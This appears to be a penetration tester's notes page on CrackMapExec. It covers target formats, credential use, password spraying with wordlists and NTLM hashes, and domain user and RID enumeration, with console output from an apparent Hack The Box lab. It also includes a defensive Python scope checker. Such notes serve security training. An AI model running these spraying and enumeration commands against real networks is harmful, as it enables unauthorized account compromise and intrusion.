Crackmapexec (CME)

CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": it abuses built-in Active Directory features and protocols to achieve its functionality, which lets it evade most endpoint protection/IDS/IPS solutions.


Usage

Running cme --help will list general options and protocols that are available (Notice the 'protocols' section below):

#~ crackmapexec --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
           [--darrell] [--verbose]
           {http,smb,mssql} ...

      ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______
     /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
    |  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
    |  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |
    |  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
     \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                                         A swiss army knife for pentesting networks
                                    Forged by @byt3bl33d3r using the powah of dank memes

                                                      Version: 4.0.0dev
                                                     Codename: 'Sercurty'

optional arguments:
  -h, --help         show this help message and exit
  -v, --version      show program's version number and exit
  -t THREADS         set how many concurrent threads to use (default: 100)
  --timeout TIMEOUT  max timeout in seconds of each thread (default: None)
  --jitter INTERVAL  sets a random delay between each connection (default: None)
  --darrell          give Darrell a hand
  --verbose          enable verbose output

protocols:
  available protocols

  {http,smb,mssql}
    http             own stuff using HTTP(S)
    smb              own stuff using SMB and/or Active Directory
    mssql            own stuff using MSSQL and/or Active Directory

Target Formats

Every protocol accepts targets as CIDR notation, single IP addresses, IP ranges, hostnames, a file containing a list of targets, or any combination of these:

crackmapexec <protocol> ms.evilcorp.org
crackmapexec <protocol> 192.168.1.0 192.168.0.2
crackmapexec <protocol> 192.168.1.0/24
crackmapexec <protocol> 192.168.1.0-28 10.0.0.1-67
crackmapexec <protocol> ~/targets.txt
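As an added example (my own code, not part of these notes or of CME), here is a Python expander for the target forms listed above, paired with a scope check that flags any expanded host outside the ranges an engagement is authorized to touch. It goes slightly beyond the list by also accepting comment lines in a target file; the `authorized_cidrs` argument and the function names are my own assumptions, and hostnames are passed through unresolved.

```python
import ipaddress
import os
import re

# Last-octet range such as 192.168.1.0-28 (the range form used in the notes above).
OCTET_RANGE_RE = re.compile(r"^(\d{1,3}\.\d{1,3}\.\d{1,3})\.(\d{1,3})-(\d{1,3})$")


def expand_target(spec):
    """Expand one CME-style target spec (CIDR, IP, last-octet range, hostname or file)."""
    spec = spec.strip()
    if not spec or spec.startswith("#"):
        return []
    path = os.path.expanduser(spec)
    if os.path.isfile(path):
        # A file holds one spec per line, each expanded with the same rules.
        with open(path) as fh:
            return [host for line in fh for host in expand_target(line)]
    if "/" in spec:
        # strict=False accepts host bits in the prefix (192.168.1.5/24). A path to a
        # missing file also lands here and raises ValueError, which is the safe outcome.
        return [str(ip) for ip in ipaddress.ip_network(spec, strict=False)]
    m = OCTET_RANGE_RE.match(spec)
    if m:
        prefix, start, end = m.group(1), int(m.group(2)), int(m.group(3))
        if not 0 <= start <= end <= 255:
            raise ValueError(f"bad octet range: {spec}")
        return [f"{prefix}.{i}" for i in range(start, end + 1)]
    try:
        return [str(ipaddress.ip_address(spec))]
    except ValueError:
        return [spec]  # anything else is passed through as an unresolved hostname


def out_of_scope(specs, authorized_cidrs):
    """Return every expanded host that does not fall inside an authorized CIDR."""
    nets = [ipaddress.ip_network(c, strict=False) for c in authorized_cidrs]
    flagged = []
    for spec in specs:
        for host in expand_target(spec):
            try:
                ip = ipaddress.ip_address(host)
            except ValueError:
                flagged.append(host)  # hostname: cannot be checked without resolving it
                continue
            if not any(ip in net for net in nets):
                flagged.append(host)
    return flagged
```

Run `out_of_scope` over the exact list you intend to hand to CME before starting; an empty result means every address sits inside the authorized ranges.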

Using Credentials

Every protocol supports using credentials in one form or another. For details on using credentials with a specific protocol, see the appropriate wiki section. Generally speaking, to use credentials, you can run the following commands:

crackmapexec <protocol> <target(s)> -u username -p password

ℹ️ When usernames or passwords contain special symbols, wrap them in single quotes so that your shell passes them through literally.

Example:

crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'

Brute force login with wordlists

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

ℹ️ By default CME exits after the first successful login. With the --continue-on-success flag it keeps spraying after a valid password is found, which is useful for spraying a single password against a large user list.

Example:

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success

Enumerating with crackmapexec

Here are some common commands to use when enumerating with crackmapexec.

Find users

┌──(kali㉿kali)-[~/htb/zephyr/192.168.210.10]
└─$ crackmapexec smb 192.168.210.10 -u users.txt -p passwords.txt
SMB         192.168.210.10  445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:Mail4Painter2022!@# STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:P@ssw0rd STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [-] zsm.local\marcus:!QAZ1qaz STATUS_LOGON_FAILURE 
SMB         192.168.210.10  445    ZPH-SVRDC01      [+] zsm.local\marcus:!QAZ2wsx

With credentials we can get all users in the domain:

crackmapexec smb zsm.local -u marcus -p password123 --users                       
SMB         zsm.local       445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         zsm.local       445    ZPH-SVRDC01      [+] zsm.local\jamie:P@ssw0rd 
SMB         zsm.local       445    ZPH-SVRDC01      [+] Enumerated domain user(s)
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\jamie                          badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\ca_svc                         badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\marcus                         badpwdcount: 6 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\paul.williams                  badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\daniel.morris                  badpwdcount: 0 desc: 
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\krbtgt                         badpwdcount: 0 desc: Key Distribution Center Service Account
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\Guest                          badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB         zsm.local       445    ZPH-SVRDC01      zsm.local\Administrator                  badpwdcount: 3 desc: Built-in account for administering the computer/domain

Use --rid-brute to enumerate all principals in the domain by brute-forcing RIDs:

crackmapexec smb zsm.local -u <user> -p <password> --rid-brute 10000

Last updated 1 year ago